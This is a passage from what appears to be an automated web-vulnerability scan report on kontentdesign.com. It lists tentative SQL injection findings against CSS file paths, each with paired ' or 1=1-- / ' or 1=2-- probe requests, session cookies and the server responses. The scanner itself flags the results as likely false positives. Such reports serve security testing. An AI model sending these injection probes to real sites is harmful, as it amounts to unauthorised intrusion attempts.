Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:09:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Fri, 07 Jan 2011 06:45:38 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:09:27 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 2793

/**
* @version        2.8
* @package        Frontpage Slideshow
* @author JoomlaWorks - http://www.joomlaworks.gr
* @copyright    Copyright (c) 2006 - 2011 JoomlaWorks, a business unit of Nuevvo Webware Ltd. All rights reserved.
* @license        Commercial - This code cannot be redistributed without permission from Nuevvo Webware Ltd.
*/

...[SNIP]...

1.20. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10350403'%20or%201%3d1--%20 and 10350403'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates10350403'%20or%201%3d1--%20/kontent11/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:02:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates10350403' or 1=1-- /kontent11/css/layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates10350403'%20or%201%3d2--%20/kontent11/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:02:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates10350403' or 1=2-- /kontent11/css/layout.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.21. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13160980'%20or%201%3d1--%20 and 13160980'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent1113160980'%20or%201%3d1--%20/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:04:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent1113160980' or 1=1-- /css/layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent1113160980'%20or%201%3d2--%20/css/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:04:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent1113160980' or 1=2-- /css/layout.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.22. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 29878068'%20or%201%3d1--%20 and 29878068'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css29878068'%20or%201%3d1--%20/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:06:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css29878068' or 1=1-- /layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css29878068'%20or%201%3d2--%20/layout.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:06:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css29878068' or 1=2-- /layout.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.23. http://kontentdesign.com/templates/kontent11/css/layout.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/layout.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 20769589'%20or%201%3d1--%20 and 20769589'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/layout.css20769589'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/layout.css20769589' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/layout.css20769589'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:08:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 567

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css/layout.css20769589' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.24. http://kontentdesign.com/templates/kontent11/css/layout.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/layout.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 87086877%20or%201%3d1--%20 and 87086877%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/layout.css?187086877%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:09:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 552

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/layout.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/layout.css?187086877%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:09:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Thu, 13 Jan 2011 07:46:43 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:09:05 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 5184

/* Copyright (C) 2007 - 2011 YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */



body {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   line-height: 150%;
   color: #646464;
}



.wrapper { margin: auto; }

#header {
   position: relative;
   z-index: 10;
   height: 150px;
   clear: both;
}

#top {
   overflow: hidden;
   clear: both;
}

#top .topbox { margin-top: 15px; }

#middle {
   padding: 15px 0px 15px 0px;
   clear: both;
}

#bottom {
   overflow: hidden;
   clear: both;
}

#bottom .bottombox { padding-bottom: 15px; }

#footer {
   position: relative;
   padding-bottom: 15px;
   clear: both;
   text-align: center;
}



#middle {
   width: 100%;
   
   overflow: hidden;
   position: relative;
}

#middle-expand {
   width: 200%;
}


#main {
   position: relative;
   left: 50%;
   width: 50%;
   float: left;
}

#main-shift {
   position: relative;
   left: -100%;
   
   
   overflow: hidden;
}


#left {
   position: relative;
   left: -50%;
   
   float: left;
   overflow:hidden;
}


#right {
   
   
   float: left;
   overflow:hidden;
}



div#maintop,
div#contenttop {
   margin: 0px 0px 15px 0px;
   overflow: hidden;
}

div#contentbottom,
div#mainbottom {
   margin: 15px 0px 0px 0px;
   overflow: hidden;
}



#mainmiddle {
   width: 100%;
   
   overflow: hidden;
   position: relative;
}

#mainmiddle-expand {
   width: 200%;
}


#content {
   position: relative;
   left: 50%;
   width: 50%;
   float: left;
}

#content-shift {
   position: relative;
   left: -100%;
   
   
   overflow: hidden;
}


#contentleft {
   position: relative;
   left: -50%;
   
   float: left;
   overflow:hidden;
}


#conte
...[SNIP]...

1.25. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 76820719'%20or%201%3d1--%20 and 76820719'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates76820719'%20or%201%3d1--%20/kontent11/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:01:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates76820719' or 1=1-- /kontent11/css/reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates76820719'%20or%201%3d2--%20/kontent11/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:01:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates76820719' or 1=2-- /kontent11/css/reset.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.26. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16077229'%20or%201%3d1--%20 and 16077229'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent1116077229'%20or%201%3d1--%20/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:03:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent1116077229' or 1=1-- /css/reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent1116077229'%20or%201%3d2--%20/css/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:03:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent1116077229' or 1=2-- /css/reset.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.27. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 26624147'%20or%201%3d1--%20 and 26624147'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

